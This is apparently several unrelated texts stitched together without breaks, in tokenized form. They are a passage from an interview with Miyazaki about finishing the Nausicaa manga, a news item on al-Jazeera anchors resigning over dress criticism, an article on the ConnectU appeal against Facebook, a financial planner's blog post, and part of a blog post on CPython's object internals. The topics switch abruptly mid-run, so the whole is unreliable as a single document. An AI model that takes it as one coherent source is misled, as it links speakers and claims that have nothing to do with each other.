That 's because there is a way of opening and closing the story in a movie .
M : Even if I had to make the movie Nausicaa now , after I finished the manga , I would make the same movie .
I do n't think that 'll change .
Y : Did n't how you ended the movie influence the manga after that ?
M : As I said before , the movie had concluded , and I was n't writing the manga to replicate it .
I did n't think about what I did in the movie at all .
Anyway , I forgot what I did .
- laughs -
But when I was making the movie Nausicaa , I was insisting that I was making Nausicaa with " wishes , " not " this is the way reality is . "
But , when I finished the movie , I found myself deeply immersed in the religious domain that I did n't want to get into very much .
I thought " this was n't good , " and I was really driven into a tight corner .
So , after the movie , I told myself that I would approach the problem more seriously to continue the manga , but once I started , there were so many things I could n't understand .
From the beginning to the end , I ended up writing with a whole lot of things I could n't understand .
Y : It was longer after you finished the movie .
M : Yes .
So , there might have been readers coming and going , and I wrote it in the magazine thinking that they might not understand what 's going on ( because they joined in the middle of the story ) .
However , I ended up thinking too much about things I can't understand at all .
Y : You mean ?
M : If we take the ( existence of ) god as a premise , we can explain the world by that .
But I can't do that .
And yet , I stepped into the area I did n't want to get into , such as humans and life .
I can manage to understand the world as conflicts and contradictions among humans , but I find myself not being satisfied with that level ( of explanation ) .
Then I have nothing I can say with confidence .
My head gets dizzy by just thinking what would you do if you are called " mama " by a God Warrior with such a destructive power .
So , Nausicaa 's perplexity is just my own perplexity .
Y : Near the end of the manga , the God Warrior had a role totally different from that in the movie ...
M : You can find a meeting with a giant one who gives you a power in many popular cultures .
Such as the elephant herd in Tarzan , or Tetsujin 28 go ( Giganto ) .
The reason why they appear so many times in different shapes can be explained as our wish to return to a huge existence or our impulse for growing up , or something like that .
Usually in the popular culture , it 's made ambiguous by just saying that a huge power is OK if it 's good .
Actually , most of the power has been made by technologies .
I think a technology itself is neutral and innocent .
It 's same with automobiles .
They are loyal and truly devoted to drivers .
We feel safe thinking machines have no heart , but actually , men give machines hearts .
A loyal heart , innocent devotion , and self sacrifice are the machines ' essence .
It 's like a dog obeying the orders of a master no matter how evil the master is .
I think the thought that humans give hearts to machines is the base of Asimov 's " Three Rules of Robotics . "
The God Warrior in Nausicaa is not that original an idea .
The design , too , you can find its root in many preexisting designs .
But , the moment I gave a tangible shape to " innocence , " it became something I can't control .
I think I gave it a shape because I have a strong yearning for innocent ones ...
Y : The story changed after the God Warrior became cognizant .
M : When I 'm writing this kind of story , I have no choice but to think that even just a thought occurred to me or some meaningless pieces do have meanings to me .
Even though the structure of the work would collapse , I should n't forget those pieces .
No , I can't explain it well .
I think there may have been people who could explain it with deeper , sharper , more proper words long before I started thinking .
I painfully realized I do n't have such a capability .
Y : Is that what you mean by a religious domain ?
M : Many things in a human 's mind which are said to be meaningful , you might call them attributes such as various thoughts or beliefs , I think they might actually exist in nature ...
We get confused because we get various worldly desires .
But I 'm afraid that I feel if we want to go beyond such desires and go somewhere pure , we might reach somewhere such as an ordinary stone or water drops .
But in the moment we put these kinds of thoughts into words , everything becomes a disreputable religion .
I can not possibly write ( these kinds of thoughts ) , I have n't reached such a stage or anything .
After all , I started caring more for the God Warrior than for humans .
Y : Or , we start caring more for Ohmu ( than for humans ) .
When we are reading Nausicaa , many such things happen ...
I lost words [ 1 ]
M : Falling into such a situation , for me , things have n't been sorted out .
While I sometimes think it 's like Dr. Strangelove , I do n't even know if it 's really strange .
Things which we think are characteristics of humans , such as feelings , even they might be shared with the simplest virus in this world .
Maybe it 's just those things we share ( with other life forms ) are only evoked inside humans .
It 'll be impossible ( to think this kind of stuff ) , unless I study ( shugyo ) with a better brain .
I think I should n't put them into words until then .
I was falling into that kind of situation .
Even though I thought that it 's dangerous , I could n't help but go that way because I had already written the God Warrior ( into the story ) ten years ago .
I ca n't say " I wrote it , but I forgot about it . " - laughs -
So , I was just following behind the story , rather than creating it .
Y : The story moved itself ...
M : Rather than moving , it was just there .
And it would n't move in the direction I wanted .
And yet , I had to force the story to move in the direction I wanted even though I myself thought it was fairly false .
But I do n't like doing this .
In the end , could Nausicaa , the girl who had to carry such burdens on her shoulders go back to the ordinary life ?
Could such a person continue to live without going mad ?
The only thing I know is that even though she wo n't be able to go back , she will continue to be there , and she ( or we ?
he did n't specify the subject ) will continue to witness it .
Y : There was a sort of solution in the movie , but in the manga , from the beginning Nausicaa asked many questions .
And without solving them , it ended with more and more questions asked .
M : Yes .
I could n't help but to ask the question of what a life is , the question I knew from the beginning I could n't answer .
My dog is sixteen years old , and he can die any day .
He can hardly see .
He can smell only a little , only one of his ears works a bit .
But , he is still alive .
When I see his face , he does n't look that happy , but when I try to take him out for a walk , he looks a little bit happy .
I wonder what a life is .
It 's strange since I 've lost both of my parents , yet I think about this when I see my dog , but for example , I think he is no longer the dog he was .
Ripples spread through water surface , and as they spread , they gradually diminish .
They are the same ripples , but they are not the same strong ripples right after they were born -- maybe I can understand that way .
There are many things said such as a life form is a carrier of selfish genes , but after all , we can't understand with ( such explanations ) .
Maybe from old times , great people thought about these kinds of things .
I mean , I 'm just beginning to understand that they seemed to have felt something even before such things as studies were established .
Y :
You learn that there are many things you can't understand ...
M : Yes .
I understand that I can't just simply and superficially explain the relationship between nature and humans , or the nature inside a human .
However , to live is the way to keep this " superficial balance , " so I can say we 'd better do such and such to keep a balance .
But if I go deeper than that , I face such chaotic questions as in which I have to face the darkness of the universe .
And it seems that the key to these kinds of questions is held in the thoughts of the people of the past who hid themselves in mountains , rather than in our own heads .
These days , I get startled when I hear religious words which I had ignored before .
I feel " oh , this has also been talked about . "
Behind simple words , for example , in an elementary textbook for Buddhism , there are great experiences or many such things .
I can feel that , but that 's just about it .
I can't understand them completely on my own .
I 'm just at a loss .
The moment I copy the words , they start changing .
But unlike such people as Shinran who wrote them down without fearing ( the change of meaning through the transition from thoughts to words ) , I can't do this . [ 2 ]
I decided not to make Nausicaa say these things since it 's inevitable that they would sound untrue .
I thought I understood things more clearly , but as I wrote Nausicaa , it actually became more difficult for me to sort things out .
I mean , it was like I lost words .
It was just like Nausicaa herself was out of words , and I thought I did n't want to express it with words .
The moment I put " I think this is this " into words , it becomes a different thing .
Y : Shortly after Nausicaa decided " I 'll keep lying , " the story ends ... M : It suits more to my heroine , it just became that way .
I have no choice but to think that it is her love toward the lives around her .
Anyway , " we are right , and we beat the enemy and the peace will come " is a lie .
At least , I can definitely say that 's a lie .
There are good and bad things .
You can do good things .
But , a person who does good things is not necessarily a good person .
It just means he / she " did good things . "
In the next moment , he / she can do bad things .
That is a human .
Unless we think that way , we misjudge everything , including political decisions , and oneself .
The collapse of the Soviet Union was easier than that of Doruk Y : During the time you were writing Nausicaa , many incidents occurred inside and outside Japan .
Was there something you were influenced by ?
M : The most shocking thing was the civil war in Yugoslavia .
Y : You mean ?
M : I thought they would n't do it again .
I thought they were tired of doing such things since they had done such horrible things before , but they were n't .
I leaned that humans never get enough .
It taught me how I was naive .
Y : And unlike the Gulf War , it was an old type war .
M : In a sense , the Gulf War is easy to understand .
The Iraqi government is very similar to the Japanese government during the war ( World War II ) .
They just send soldiers to some island or desert , and tell them " you are on your own , " without sending any water or food .
It was painful to see such a military since it was like looking at the Japanese military .
But it 's different in Yugoslavia .
I think it was started by a few gangs .
But we could n't stop it .
It 's just like when Nazism was growing in Germany , many people who were there said they were just a bunch of gangs , but they grew into an unstoppable power .
For example , when we watch news such as CNN , it seems that the Serbs are overwhelmingly evil .
But if you get to the bottom of it , it 's somewhat different .
There is definitely a conflict between Western Europe and the Greek Orthodoxy within Christianity .
So , no wonder Serbs doubt NATO .
They would rather have the Russians .
Then , are Serbs right ?
No .
Both are really stupid , and both commit many unspeakable acts .
Even if there is such a thing as justice , once a war has started , any war will become corrupt .
That 's a war .
Y : Nausicaa also said " there is no justice . "
M : I read various things since I like ( reading about ) war .
So , people ask me such questions as " do you like war ? "
I answer them " do you think AIDS researchers love AIDS ? "
But I was forced to realize that my understanding of history was really naive .
Y : How about the collapse of the Soviet Union ?
M :
It happened just when I was writing the collapse of a country called Doruk in Nausicaa .
Writing it , I myself was wondering if it could be possible for such an empire as Doruk to collapse so easily , so I was really surprised since the Soviet Union collapsed much easier .
A country collapses and , at the same time , people can go on living their daily lives .
Such a thing can really happen .
I had been wondering for a long time about what had happened , what had become of those people who were living when the Western Roman Empire fell , but with the collapse of the Soviet Union , I sort of got the answer for that .
Y : I 'll say , that 's a good correlation ...
M : So , there were many things I should have written about the collapse of the Doruk Empire .
But , on the other hand , I 'm embarrassed to say that there was a limit to my productivity , sixteen pages per month , so there were many things I could n't write .
Why did the country fall , or to begin with , what is a country ?
What kind of system did they have , why did the system stop working ...
I knew I had to write these things , but while I was making the excuse that I did n't have the time for that , the empire fell on its own in the manga , and in the real world , the Soviet Union , too ...
Nausicaa has changed my way of thinking M : During the time I was trying to conclude Nausicaa , I did what some might think is a turnabout .
I totally forsook Marxism .
I had no choice but to forsake it .
I decided that it is wrong , that historical materialism is also wrong , and that I should n't see things with it .
And this is a bit hard .
Even now , I sometimes think that things would be easier if I had not changed .
It 's not that I changed dramatically , or changed by fighting ( myself ) relentlessly while I was writing , but various questions inside me became overwhelming .
I think that this clear change in my way of thinking came from my writing Nausicaa , rather than the change of my position in this society .
For example , at first , I even hesitated in making Nausicaa a daughter of the Chieftain Ghil - in short , a princess .
I thought some might say such things as Nausicaa is in a sort of elite class , so I thought of ways ( to justify my choice ) .
But these things became meaningless to me .
It does n't matter where she was born .
I do n't want to have a discussion about such things anymore .
No matter which class one is born into , a stupid person is a stupid person , and a nice one is a nice one .
It 's not that one is right or wrong , it 's just whether he / she is a nice guy , whether I want to become a friend with him / her .
There are just such ( a distinction of ) people in this world .
I stopped seeing things by class .
It 's a lie that one is right just because he / she is a laborer .
The general public do many stupid things .
I can't trust polls .
With these kinds of things , I 'm just going back to basics .
This is not something eye - opening , it 's been said many times .
If I think about going back there again , I feel really dark , but I think I have to accept that .
I think I have to see things on my own .
When I first saw the film of Mao Tse - tung receiving cheers from the big crowd in Tiananmen Square , I think it was the end of the 1950s , I felt his face was really inauspicious and ill favored .
But since I was told that he had a big warm personality or such things , I thought maybe he happened to be ill and was n't photogenic on that day , - laughs - I really thought so .
But thinking back , I should 've trusted my first feeling .
I did such things many times .
I always tried to overpower my feelings with my ideals .
I stopped doing so .
I also look at the contemporary politicians just with my impressions .
Y : With your intuition ...
M : The feeling that this is a nice person , rather than an intuition .
Even if he / she does n't have a political capability , this is a nice person .
We can't expect big things from them anyway , so the nicest one is better .
I 'm at the stage of seeing things tentatively with that level ( of thinking ) .
In short , I went back to being stupid .
Y : Is n't it like climbing spiral stairs rather than going back ?
M : I feel I might be just going round and round ...
For example , there is a National Trust Movement called " Totoro 's Forest Movement , " and they use the characters from the movie we made to promote the movement . [ 3 ]
But I 'm cooperating not because they are right .
It 's because those who are in the movement are such nice people .
They are so down to earth .
They are people who have loved the Sayama Hills long before they started the movement . [ 4 ]
They walked around to see plants and birds when they had free time , and kept thinking how they could do something about the place .
Because they are such people , we are happy to let them use our characters .
If someone like a fascist of ecology is in charge , I 'd pull out .
Like that , these days , I associate with people not because they are right or wrong , but because they are nice .
So , my world is getting smaller and smaller .
- laughs -
" Solving " the environmental problem by cleaning up the river in the neighborhood Y : How about the Japan you said you were disgusted with at before you started Nausicaa ?
M : Well , I passed the stage of feeling that " it serves them right " after the bubble burst , and I 'm feeling refreshed now . [ 5 ]
The problems have n't been solved at all , but this breaks down the wall , and things outside are coming in . [ 6 ]
The rice shortage was nothing . [ 7 ]
It 's not like people were starving .
I was rather amazed by the economic power , though .
Y : You mean , if we want to , we can buy ( from outside ) .
M : If this had happened in 1940s , it would have been a huge problem , but now we get by with just some complaints such as " Thai rice do n't taste as good . " [ 8 ]
I thought this was an amazing power ( i.e. , the economic power of Japan ) .
At the same time , I also thought it 's hard for a country without an economic power to survive ...
I 'm tired of discussing the Japanese agriculture .
If I may say so though I might get misunderstood .
I happened to meet a farmer who said he would keep producing organic rice without pesticide , so I decided to buy rice from him , even if the price went up in a bad crop year .
With it , the agricultural problem at my home were solved .
- laughs -
Of course , it would n't be any solution , but I do n't like such sensational expressions as " Japanese agriculture has lost " as much as I do n't like " Japanese movies are dead , " though I can understand the anger . [ 9 ]
I feel somehow , that 's not it .
It 's not something you lose or win so easily .
I only get irritated when I hear the agricultural cooperation being this or that while we are discussing the agricultural problems .
I just want to solve it at a personal level .
It 's not something I can proud of .
But , even so ...
It 's different if someone is starving to death , though .
These days , I can only think that way .
Environmental problems , too .
Since the people in the community are cleaning up the river in my neighborhood , I join them when I have the time .
I think that 's just fine .
But this wo n't solve any problems either .
It just means we are picking up discarded plastic bags or something , you know .
In short , there are so many things we can't do anything about if we think about generalities .
Things wo n't go well because there is a huge gap between the generalities and the particulars .
But , a human can often be satisfied with the particulars .
That 's what I like best these days .
If we see generalities from the top of a mountain or from a plane , we feel it 's hopeless , but if we go down , there is a nice road running about fifty meters , we feel this is a nice road , and if the weather is fine and shining , we feel we can go on .
I wonder why we feel so differently depending on our viewpoints .
I think that doing such things suit me better than talking about big things on a stage at a symposium or a lecture .
But I will drive a car and cause pollution .
If everyone has to stop , I 'll stop , but even so , I 'll continue to drive to the last .
Raise the gas price to ¥300 per liter .
- laughs -
Gee , I 'm shooting my mouth off as I please , are n't I ? Y : If so , there wo n't be so many cars .
M : I get so angry when I hear someone say " if we lower the gas price , it 'll stimulate the Japanese economy . "
Only those who are willing to pay the price should drive .
Everyone driving a car is n't a progress or an equality among humans , or anything .
Now , we have the problem of popularization of everything .
Since I myself belong to the general public , even though I see a picture of the Zeppelin and want to ride an airship , if I had been there in that era , I would 've belonged to those who could not ride one .
Even so , I do n't think we 'd better make an era where everyone can ride an airship .
I 'm thinking about putting soil and grass on the roof of this building ( Studio Ghibli ) this year .
This wo n't solve any problem either , but it 's better to act than just being angry .
I heard that the heating and cooling costs would also change by doing so .
Many people would say it wo n't be a big solution , and it is n't , but I think if I can do it , I want to do it .
There is a photographer who is working for a project to invite children who got radiation in Chernobyl to Japan and give them treatments .
After staying in Japan for a month , they become much healthier since they are getting better nutrition , too .
For example , a child who had stopped growing started growing again .
But he knows that the child will go back to the previous state once he returns home a month later .
And he is agonized by the thought that even though he brings ten kids or so to Japan , it 'll be of no use for the rest of the several ten thousands kids .
I think that 's just fine -- though if I say so , I 'd be misunderstood -- I think that 's what humans can do .
" Is it meaningless if the child die ? "
No , it is n't .
Maybe , what those children felt at that time is everything .
But , the moment I put these kind of things into words , it will be grossly misunderstood somewhere .
It 's difficult .
If we try to judge by results , many things become difficult .
If I say " this moment is important , " someone might take it as that we just have to care only about this moment .
It 's difficult .
It 's really difficult to put into words .
Y : It 's easy to pick on words .
Whatever you say , you can get picked on .
M : There are many things I can't put into words .
I say " we just have to clean the river , " because so many people put the " eco mark " on me , so I just ... [ 10 ]
Y : You say these things intentionally to create a controversy .
M : Yes .
In truth , I do n't want to say anything .
I 'd better act and not say a word .
It 's better if I think that I do this because it 's a communal effort .
Leaving what I do n't understand as it is Y : After you had made the movie Nausicaa , and while you kept writing Nausicaa , you made animes such as Laputa , Totoro , Kiki , and Porco Rosso .
These are different types of anime from Nausicaa .
M : I think I was able to make them because I was writing Nausicaa .
I had Nausicaa as the heaviest one .
It 's painful to go back to the world of Nausicaa , and I do n't want to go back .
Even though I 'm writing it in this world , writing such a thing makes it difficult for me to return to society .
Y : You keep removing yourself ?
M : Yes .
But , if I 'm in the middle of a movie production , it 's a big fuss .
I get my attention pulled by every trivial daily detail .
" Why is he goofing off ? " or " he 'd better get a wife , " - laughs - or that kind of stuff .
It 's really worldly .
And we make a fuss about if people come to see it or not .
After finishing a movie , being stupefied , I take a off , and then , Nausicaa is waiting .
I hate this .
I wander around it half a year or so , and then I start writing since I have no choice .
But , as I said before , to tell the truth , I made movies partly because I wanted to escape from Nausicaa .
I did n't intend to do the light stuff because I was doing the heavy stuff here , but if I had n't been writing Nausicaa , I think I would have struggled trying to put a bit heavier stuff into the movies .
That 's what I think now , looking back .
I did n't think that way then , and I made them because I thought that kind of movie was good .
It was n't like I planned to write Nausicaa , so I do n't think I will ever do anything like it again .
Y : What are your perspectives after you concluded Nausicaa ?
M : Concluding Nausicaa does n't mean that the events have ended or concluded .
Things will keep on going endlessly , but we came to the point of " from here , you know ( what will happen ) . "
I mean , we came to the same starting point as that of our modern day world which is difficult to understand .
From this point , countless stupid things will happen , and there will be efforts to cope with them , too .
And they will repeat them over and over again .
I tried to conclude at the point we could see that .
I realized this while I was writing , but the role of Nausicaa is not one of actually being a leader , or of leading people .
Like a representative , she keeps looking at things , the role is as a sort of medium .
And the structure ( of the story ) was such that the people who trusted Nausicaa kept moving things .
So , it 's not a plot in terms of how stories are usually structured .
I was troubled about this , too .
So , it concluded for now , but I have many things I have to sort out such as these by the time the last volume will be published .
But I decided to end it for now , leaving things I could n't understand as they are .
Otherwise , I can't finish the work I started in my early 40s and I can't grow old .
Actually , the moment I finished writing , I started feeling that I became a really old man ( jijii ) .
But , nothing has ended .
So , I do n't feel relieved at all .
I wish I could say I left my burden .
I thought things would become easier for me , but they did n't .
I thought it would be easier since I did n't have to write it anymore , but , it just meant the second most painful work was promoted to the most painful one .
- laughs - Y : Anyway , at least we can see there are still many issues .
M : Yes .
And Nausicaa knows this best .
No less than five al - Jazeera female news anchors have handed in their resignation from the popular Arab news television station .
The reason – " Harassment and criticism of dress and claims of immodesty " .
The resignation was reported in Sunday 's edition of London - based al - Hayat newspaper .
Sources told the newspaper the five anchors to resign are Jumana Taymoor , Lina Zahr al - Din and Julnar Musa of Lebanon , Luna al - Shibl of Syria , and Nofar Afali of Tunisia .
In addition to the five presenters resigning , three more female anchors wrote a protest letter to the network 's management .
The three are Khadija Bin Qanna , Eman Bannora , and Lily a - Shili .
According to the al - Hayat report , its sources said , " The al - Jazeera presenters are considered the most modestly dressed presenters of all Arab satellite channels , " hinting to other Arab television channels that show female presenters in more revealing attire .
Nonetheless , the Qatar - based network has decided to take a very firm approach to its dress code , and , according to al - Hayat 's sources , the female anchors have been subjected to offensive remarks .
' Qatari society takes pride in woman 's participation '
According to the report , eight of the network 's female presenters , including those who have now resigned , sent a letter of complaint to one of the station 's mangers in January .
In their letter , the women protested the repeated remarks and public criticism that had been leveled at them regarding " clothing and modesty " .
Al - Hayat 's sources lashed out at the station saying , " The network 's path of extremism contradicts the positive principles of openness and transparency in the Qatari society , which takes pride in the woman 's participation in various fields . "
The sources said it is possible that additional female anchors may submit their resignation in the future .
Al - Jazeera Director - General Wadah Khanfar appointed a committee to probe the matter , and its recommendations were submitted last Tuesday .
" It is the network 's prerogative to oversee the general appearance of the anchors on screen , " the committee ascertained .
" It is its prerogative to place conditions and restrictions that support the spirit of the channel and its principles . "
The committee rejected the presenters ' claims , and denied that any criticism of them bordered on " harassment " or was meant to hurt them personally or hurt their reputations .
The committee stressed that all comments were made on the general look allowed on the al - Jazeera screen .
Either way , it seems this affair is far from over .
Updated .
May has been a bad month for Facebook CEO Mark Zuckerberg , who just turned 26 last Friday but spent his birthday wrestling with an uproar over Facebook ’s privacy practices .
The latest unwelcome gift : accusations of securities fraud from former Harvard schoolmates who say he and other Facebook executives tricked them into a supposed $ 65 million settlement that was actually worth far less .
Divya Narendra and brothers Cameron and Tyler Winklevoss ( pictured above ) contend that they hired Zuckerberg to work on their social network , ConnectU , when they were all students at Harvard , only to have him delay the project and use ConnectU ’s code to launch his own project , then called The Facebook .
Their side of the story gained credence after instant messages sent by Zuckerberg bragging about his success in duping them emerged in the press .
Both sides have been locked in litigation since their college years .
ConnectU and Facebook reached a tentative settlement for $ 65 million in 2008 , but the Winklevoss brothers and Narendra , in the brief filed in their appeal , said that the settlement was never finalized and that a judge acted improperly in allowing the settlement to proceed and awarding ownership of ConnectU to Facebook .
Judge James
Ware ruled in the original case , tried in San Jose .
A three - judge panel will hear the appeal once it reaches court .
That legal maneuver allowed Facebook , as the owner of ConnectU , to fire ConnectU ’s lawyers , who included the famed law firm of Boies Schiller & Flexner .
Partner David Boies prosecuted the antitrust case against Microsoft , putting Bill Gates through a grueling deposition .
By claiming the right to dismiss ConnectU ’s lawyers , Facebook ’s legal team spared Zuckerberg from a similar fate .
The ConnectU cofounders are arguing that Facebook executives and lawyers presented the cash - and - stock offer ’s value as $ 65 million , relying on a valuation of $ 15 billion that Microsoft paid in 2007 when buying preferred shares in the company .
The settlement , however , was to be paid in common shares , not preferred shares , which Facebook itself valued at roughly 75 percent less for the purposes of calculating taxes on stock - based compensation — cutting the settlement ’s offer roughly in half .
The real question here is why Facebook ’s lawyers have n’t succeeded in making this lawsuit go away .
Before , ConnectU ’s founders were just after a piece of the Facebook pie .
Now , the stakes keep getting higher as the case drags on .
An actual finding of securities fraud would make it difficult for Zuckerberg to remain Facebook ’s CEO if it were to go public .
However unlikely that is , why take the risk ?
Facebook did not respond to a request for comment .
This story has been corrected to reflect the following : Judge James
Ware ruled in the original case ; he will not hear the appeal .
A finding of securities fraud in a civil case like this one would not constitute an indictment , which occurs in criminal cases .
Here ’s the appeal brief :
http://viewer.docstoc.com/
The Facebook Inc. vs. ConnectU Inc. Appeal Brief
The wild gyrations in the market over the past few weeks – the Dow closing in “ correction ” territory and below its 200 day moving average .
It all makes me want to say :
I love the smell of volatility in the morning !
Okay , so I ’m being a bit facetious as I write that .
It does remind me of what I see most mornings on select financial news channels though .
I hear things like :
This is a great opportunity – Stock XYZ is exhibiting bullish trends as it breaks through its 50 day moving average .
Call option is high .
This stock is …….
If you have ever seen any of the shows , you understand what I ’m saying .
Basically , I am just so incredibly tired of hearing how the stock du jour is the best opportunity you have to make some money in an overall sluggish market .
This is usually being hyped on a media outlet – one that is concerned with keeping ratings high .
Not one that is concerned about how the stock works with your overall asset allocation or how this stock is helping you move closer to your goals .
I seldom hear about how a truly comprehensive plan from an unbiased fiduciary is the best option in the long run .
Why ?
Because what we do is not sexy … it is not glamorous …. it does not make anyone rich overnight .
We are not touting how we are going to be able to add significant alpha ( i.e. , Beat the Market ) to portfolios .
What we do is much much more important than looking at investment performance .
We do the boring work .
The stuff like :
Planning the best way to pay for college for their children
Retire in a manner consistent with their desires
Manage their cash flows
Achieve a balanced asset allocation that is consistent with their risk profile and goals
Sleep better at night
Save time
We all have different personalities so each planner you talk with may do things a little bit different .
But there is one thing we all agree on and that is our ultimate objective .
And that is to do what is in the best interest of the client .
Not what is going to be best for us .
Not what is going to be best for the company we work for .
But what is best for the client and the client alone .
If investment performance alone is what leads you to choose the type of financial professional you work with , then my style is not the right one for you .
If you want to get rich quick via the market , then my style is not the right one for you .
If you want an objective evaluation of your finances and a systematic approach to help you achieve your goals , then we may be the right ones for you .
Feel free to share your thoughts and opinions …
As I said in the introduction to this series ( which was rather successful ; thank you everyone , your hits and comments literally keep me going ! ) – today ’s post will be about Python 3.x ’s implementation of objects .
When I set out to write this post , I thought we ’ll start with objects because it would be a gentle start for our series .
After reading all the code I had to read to write this post , I can hardly say Python ’s object system is , uhm , ‘ gentle ’ ( and I definitely ca n’t say I grokked it ) .
However , if anything , I was only further convinced that the implementation of objects is a good place for us to start because as we ’ll see in later posts it ’s so fundamental to the innards of Python , yet I suspect it ’s not very often understood in its full glory even among Python veterans .
Objects are not very tightly coupled with anything else in Python ( I hardly visited ./ Python for this post , I frequented mostly ./ Objects and ./ Include ) , so I found it easiest to look at the implementation of objects as if they ’re unrelated to the ‘ rest ’ , as if they ’re a general purpose C API for creating an object subsystem .
Maybe you will benefit from that line of thought , too : remember these are just a bunch of structures and some functions to manipulate them .
Without further ado , let ’s start .
Mostly everything in Python is an object , from integer to dictionaries , from user defined classes to built - in ones , from stack frames to code objects .
Given a pointer to a piece of memory , the very least you must expect of it to treat it as an object are just a couple of fields defined in a C structure called ./ Include / object.h : PyObject :
typedef struct _object { Py_ssize_t ob_refcnt ; struct _typeobject * ob_type ; } PyObject ;
Many objects extend this structure to accommodate other variables required to represent the object ’s value , but these two fields must always exist : a reference count and type ( in special debug builds , a couple other esoteric fields are added to track references ) .
The reference count is an integer which counts how many times the object is referenced .
>>> a = b = c = object ( ) instantiates an empty object and binds it to three different names : a , b and c .
Each of these names creates another reference to it even though the object is allocated only once .
Binding the object to yet another name or adding the object to a list will create another reference – but will not create another object !
There is much more to say about reference counting , but that ’s less central to the overall object system and more related to Garbage Collection .
I ’d rather consider writing a separate post about that later than elaborate here , we ’ve a heady post ahead of us .
However , before we leave this subject for now , I ’d just like to note that we can now better understand the ./ Include / object.h : Py_DECREF macro we ’ve seen used in the introduction and did n’t know how to explain :
It simply decrements ob_refcnt ( and initiates deallocation , if ob_refcnt hit zero ) .
That ’s all we ’ll say about reference counting for now .
Which leaves us with ob_type , a pointer to an object ’s type , a central piece of Python ’s object model ( bear this deep in mind : in Python 3 , type and class effectively mean the same thing ; historic reasons lead to the usage of one name over the other depending on context ) .
Every object has exactly one type , which never changes during the lifetime of the object ( under extremely unusual conditions it can be changed , no API exists for that and if you handle type - changing objects you ’re not likely to be reading this ) .
Possibly most importantly , the type of an object ( and only the type of an object ) determines what can be done with an object ( see the collapsed snippet at the end of this paragraph for a demonstration in code ) .
Recall from the introduction that when the interpreter evaluates the subtraction opcode , a single C function ( PyNumber_Subtract ) will be called regardless of whether its operands are an integer and an integer , an integer and a float or even something nonsensical ( subtract an exception from a dictionary ) .
# n2w : the type , not the instance , determines what can be done with an instance >>> class Foo( object ) : ... " I do n't have __call__ , so I can't be called " ... >>> class Bar( object ) : ... __call__ = lambda *a , **kw : 42 ... >>> foo = Foo( ) >>> bar = Bar( ) >>> foo ()
Traceback ( most recent call last ) : File " < stdin > " , line 1 , in < module > TypeError : ' Foo ' object is not callable >>> bar ( ) 42 # will adding __call__ to foo help ? >>> foo.__call__ = lambda *a , **kw : 42 >>> foo ()
Traceback ( most recent call last ) : File " < stdin > " , line 1 , in < module > TypeError : ' Foo ' object is not callable # how about adding it to Foo ? >>> Foo.__call__ = lambda *a , **kw : 42 >>> foo() 42 >>>
Initially , this is a peculiar thing .
How can a single C function be used to handle any kind of object that is thrown at it ?
It can receive a void * pointer ( actually it receives a PyObject * pointer , which is also opaque insofar as the object ’s data is concerned ) , but how will it know how to manipulate the object it is given ?
In the object ’s type lies the answer .
A type is in itself a Python object ( it also has a reference count and a type of its own , the type of almost all types is type ) , but in addition to the refcount and the type of the type , there are many more fields in the C structure describing type objects .
This page has some information about types as well as type ‘s structure ’s definition , which you can also find it at ./ Include / object.h : PyTypeObject , I suggest you refer to the definition occasionally as you read this post .
Many of the fields a type object has are called slots and they point to functions ( or to structures that point to a bunch of related functions ) .
These functions are what will actually be called when Python C- API functions are invoked to operate on an object instantiated from that type .
So while you think you ’re calling PyNumber_Subtract on both a , say , int and a float , in reality what happens is that the types of it operands are dereferenced and the type - specific subtraction function in the ‘ subtraction ’ slot is used .
So we see that the C - API functions are n’t generic , but rather rely on types to abstract the details away and appear as if they can work on anything ( valid work is also just to raise a TypeError ) .
Let ’s see this play out in detail : PyNumber_Subtract calls a generic two - argument function called ./ Object/abstract.c : binary_op , and tells it to operate on the number - like slot nb_subtract ( similar slots exists for other functionality , like , say , the number - like slot nb_negative or the sequence - like slot sq_length ) . binary_op is an error - checking wrapper around binary_op1 , the real ‘ do work ’ function .
./ Objects/abstract.c : binary_op1 ( an eye - opening read in itself ) receives BINARY_SUBTRACT ‘s operands as v and w , and then tries to dereference v-> ob_type ->tp_as_number , a structure pointing to many numeric slots which represents how v can be used as a number .
binary_op1 will expect to find at tp_as_number -> nb_subtract a C function that will either do the subtraction or return the special value Py_NotImplemented , to signal that these operands are ‘ insubtracticable ’ in relation to one another ( this will cause a TypeError exception to be raised ) .
If you want to change how objects behave , you can write an extension in C which will statically define its own PyObjectType structure in code and fill the slots away as you see fit .
But when we create our own types in Python ( make no mistake , >>> class Foo(list ) : pass creates a new type , class and type are the same thing ) , we do n’t manually allocate a C structure and we do n’t fill up its slots .
How come these types behave just like built - in types ?
The answer is inheritance , where typing plays a significant role .
See , Python arrives with some built - in types , like list or dict .
As we said , these types have a certain set of functions populating their slots and thus objects instantiated from them behave in a certain way , like a mutable sequence of values or like a mapping of keys to values .
When you define a new type in Python , a new C structure for that type is dynamically allocated on the heap ( like any other object ) and its slots are filled from whichever type it is inheriting , which is also called its base ( what about multiple inheritance , you may ask ?
some other post , I might answer ) .
Since the slots are copied over , the newly created sub - type has mostly identical functionality to its base .
Python also arrives with a featureless base object type called object ( PyBaseObject_Type in C ) , which has mostly null slots and which you can extend without inheriting any particular functionality .
So you never really ‘ create ’ a type in pure Python , you always inherit one ( if you define a class without inheriting anything explicitly , you will implicitly inherit object ; in Python 2.x , not inheriting anything explicitly leads to the creation of a so called ‘ classic class ’ , which is out of our scope ) .
Of course , you do n’t have to inherit everything .
You can , obviously , mutate the behaviour of a type created in pure Python , as I ’ve demonstrated in the code snippet earlier in this post .
By setting the special method __call__ on our class Bar , I made instances of that class callable .
Someone , sometime during the creation of our class , noticed this __call__ method exists and wired it into our newly created type ’s tp_call slot .
./ Objects / typeobject.c : type_new , an elaborate and central function , is that function .
We shall revisit that function , at length , in “ Objects 102 ” ( or 103 , or 104 … ) , but for now , let ’s look at a small line right at the end , after the new type has been fully created and just before returning : fixup_slot_dispatchers ( type ) ; .
This function iterates over the correctly named methods defined for the newly created type and wires them to the correct slots in the type ’s structure , based on their particular name ( where are these methods stored ?
later ! ) .
Another thing remains unanswered in the sea of small details : we ’ve demonstrated already that setting the method __call__ on a type after it ’s created will also make objects instantiated from that type callable ( even objects already instantiated from that type ) .
How come ?
With elegance , my friends .
Recall that a type is an object , and that the type of a type is type ( if your head is spinning , try : >>> class Foo(list ) : pass ; type ( Foo ) ) .
